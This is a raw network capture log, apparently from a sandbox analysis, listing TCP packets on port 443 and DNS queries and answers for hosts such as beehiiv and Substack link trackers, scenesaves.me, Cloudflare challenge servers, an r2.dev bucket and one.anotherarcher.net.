                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.410952091 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.410952091 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.410993099 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.411202908 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.411264896 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.411277056 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.411326885 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.411375999 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.411978006 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.412050009 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.412059069 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.415667057 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.415746927 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.415756941 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.450261116 CEST4434988279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.453190088 CEST4434988379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.460304976 CEST4434988179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.461658955 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.475959063 CEST4434988479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.479587078 CEST49881443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.479600906 CEST4434988179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480036974 CEST49883443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480104923 CEST4434988379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480158091 CEST4434988179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480232000 CEST49882443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480238914 CEST4434988279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480480909 CEST49884443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480496883 CEST4434988479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.480981112 CEST4434988479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.481375933 CEST4434988279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.481411934 CEST4434988379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.481754065 CEST49881443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.481842995 CEST4434988179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.482855082 CEST49884443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.482940912 CEST4434988479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.484049082 CEST49883443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.484246969 CEST4434988379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.484966993 CEST49882443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.485152006 CEST4434988279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.485582113 CEST49881443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.485889912 CEST49884443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.486171961 CEST49883443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.486439943 CEST49882443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.495765924 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.495960951 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496026039 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496092081 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496119022 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496177912 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496193886 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496659040 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496721029 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496727943 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496835947 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496886969 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496893883 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.496967077 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497040987 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497051001 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497689962 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497767925 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497772932 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497787952 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497828007 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.497869015 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498006105 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498058081 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498066902 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498631001 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498694897 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498703003 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498713970 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498761892 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.498802900 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.527429104 CEST4434988479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.531403065 CEST4434988279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.531404018 CEST4434988179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.531411886 CEST4434988379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.537046909 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.537070990 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.537199020 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.537234068 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.537297964 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582019091 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582160950 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582233906 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582304001 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582359076 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582398891 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582482100 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582707882 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.582786083 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583492041 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583551884 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583590984 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583678007 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583699942 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583709002 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.583733082 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.584379911 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.584450006 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.584459066 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.584503889 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.585257053 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.585331917 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.585365057 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.585539103 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.586309910 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.586371899 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.586400032 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.586452961 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.587158918 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.587230921 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.587244034 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.587296009 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.588171005 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.588232994 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.589024067 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.589086056 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.623330116 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.623493910 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668220997 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668308973 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668451071 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668515921 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668560028 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668607950 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668646097 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668690920 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668812990 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668874025 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668911934 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.668962955 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669013023 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669073105 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669450045 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669526100 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669533968 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669558048 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669588089 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669687986 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669738054 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669756889 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669805050 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669810057 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669826984 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.669851065 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.670285940 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.670346022 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.670355082 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.670394897 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.670413017 CEST44349880104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:34.670465946 CEST49880443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Oct 3, 2024 22:56:54.664617062 CEST192.168.2.41.1.1.10xddaStandard query (0)www.google.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:54.664927959 CEST192.168.2.41.1.1.10xc3d4Standard query (0)www.google.se65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:55.919271946 CEST192.168.2.41.1.1.10xf5ccStandard query (0)link.mail.beehiiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:55.919441938 CEST192.168.2.41.1.1.10xd438Standard query (0)link.mail.beehiiv.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:56.936068058 CEST192.168.2.41.1.1.10x90adStandard query (0)link.sbstck.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:56.936639071 CEST192.168.2.41.1.1.10x7f3aStandard query (0)link.sbstck.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:57.164643049 CEST192.168.2.41.1.1.10xc1f2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:57.165513992 CEST192.168.2.41.1.1.10x16b3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:58.651109934 CEST192.168.2.41.1.1.10xe441Standard query (0)scenesaves.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:58.651496887 CEST192.168.2.41.1.1.10x5085Standard query (0)scenesaves.me65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.716471910 CEST192.168.2.41.1.1.10xef03Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.716968060 CEST192.168.2.41.1.1.10xef50Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.575248957 CEST192.168.2.41.1.1.10x3a1eStandard query (0)scenesaves.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.575490952 CEST192.168.2.41.1.1.10x5d83Standard query (0)scenesaves.me65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.969649076 CEST192.168.2.41.1.1.10x80a7Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.969950914 CEST192.168.2.41.1.1.10x513aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.001182079 CEST192.168.2.41.1.1.10xe46Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.001396894 CEST192.168.2.41.1.1.10x3c11Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.002214909 CEST192.168.2.41.1.1.10x1a28Standard query (0)pub-cb72f4af1674441897427b55eaf679a1.r2.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.002669096 CEST192.168.2.41.1.1.10xd915Standard query (0)pub-cb72f4af1674441897427b55eaf679a1.r2.dev65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.073019981 CEST192.168.2.41.1.1.10x4d61Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.073144913 CEST192.168.2.41.1.1.10x789fStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.267220974 CEST192.168.2.41.1.1.10x1c78Standard query (0)pub-cb72f4af1674441897427b55eaf679a1.r2.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.267488956 CEST192.168.2.41.1.1.10xa513Standard query (0)pub-cb72f4af1674441897427b55eaf679a1.r2.dev65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.303577900 CEST192.168.2.41.1.1.10xf69fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.303740978 CEST192.168.2.41.1.1.10xbba7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.378591061 CEST192.168.2.41.1.1.10x4286Standard query (0)one.anotherarcher.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.378739119 CEST192.168.2.41.1.1.10x129Standard query (0)one.anotherarcher.net65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:07.689682961 CEST192.168.2.41.1.1.10x989bStandard query (0)one.anotherarcher.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:07.689822912 CEST192.168.2.41.1.1.10x5232Standard query (0)one.anotherarcher.net65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:08.218952894 CEST192.168.2.41.1.1.10x606cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:08.219209909 CEST192.168.2.41.1.1.10xea43Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:57.213391066 CEST192.168.2.41.1.1.10xb336Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:57.213763952 CEST192.168.2.41.1.1.10x98deStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:00.716519117 CEST192.168.2.41.1.1.10x379dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:00.716690063 CEST192.168.2.41.1.1.10xf3eeStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:08.812155008 CEST192.168.2.41.1.1.10xa099Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:58:08.812298059 CEST192.168.2.41.1.1.10x1530Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Oct 3, 2024 22:56:54.672554970 CEST1.1.1.1192.168.2.40xddaNo error (0)www.google.se216.58.206.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:55.929133892 CEST1.1.1.1192.168.2.40xf5ccNo error (0)link.mail.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:55.929133892 CEST1.1.1.1192.168.2.40xf5ccNo error (0)link.mail.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:55.929574013 CEST1.1.1.1192.168.2.40xd438No error (0)link.mail.beehiiv.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:56.945859909 CEST1.1.1.1192.168.2.40x90adNo error (0)link.sbstck.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:56.945859909 CEST1.1.1.1192.168.2.40x90adNo error (0)link.sbstck.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:56.947947025 CEST1.1.1.1192.168.2.40x7f3aNo error (0)link.sbstck.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:57.172590017 CEST1.1.1.1192.168.2.40xc1f2No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:57.172849894 CEST1.1.1.1192.168.2.40x16b3No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:58.671672106 CEST1.1.1.1192.168.2.40x5085No error (0)scenesaves.me65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:58.671686888 CEST1.1.1.1192.168.2.40xe441No error (0)scenesaves.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:56:58.671686888 CEST1.1.1.1192.168.2.40xe441No error (0)scenesaves.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.724956036 CEST1.1.1.1192.168.2.40xef03No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.589854956 CEST1.1.1.1192.168.2.40x5d83No error (0)scenesaves.me65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.593014956 CEST1.1.1.1192.168.2.40x3a1eNo error (0)scenesaves.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.593014956 CEST1.1.1.1192.168.2.40x3a1eNo error (0)scenesaves.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.976717949 CEST1.1.1.1192.168.2.40x80a7No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.976717949 CEST1.1.1.1192.168.2.40x80a7No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.976778030 CEST1.1.1.1192.168.2.40x513aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.010874033 CEST1.1.1.1192.168.2.40xe46No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.028326035 CEST1.1.1.1192.168.2.40x1a28No error (0)pub-cb72f4af1674441897427b55eaf679a1.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.028326035 CEST1.1.1.1192.168.2.40x1a28No error (0)pub-cb72f4af1674441897427b55eaf679a1.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.080132008 CEST1.1.1.1192.168.2.40x4d61No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.278536081 CEST1.1.1.1192.168.2.40x1c78No error (0)pub-cb72f4af1674441897427b55eaf679a1.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.278536081 CEST1.1.1.1192.168.2.40x1c78No error (0)pub-cb72f4af1674441897427b55eaf679a1.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.310868979 CEST1.1.1.1192.168.2.40xbba7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.311368942 CEST1.1.1.1192.168.2.40xf69fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.311368942 CEST1.1.1.1192.168.2.40xf69fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:05.415941000 CEST1.1.1.1192.168.2.40x4286No error (0)one.anotherarcher.net79.137.248.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:07.729809999 CEST1.1.1.1192.168.2.40x989bNo error (0)one.anotherarcher.net79.137.248.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:08.226088047 CEST1.1.1.1192.168.2.40xea43No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:08.226118088 CEST1.1.1.1192.168.2.40x606cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:08.226118088 CEST1.1.1.1192.168.2.40x606cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Oct 3, 2024 22:57:44.898293018 CEST1.1.1.1192.168.2.40x6141No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
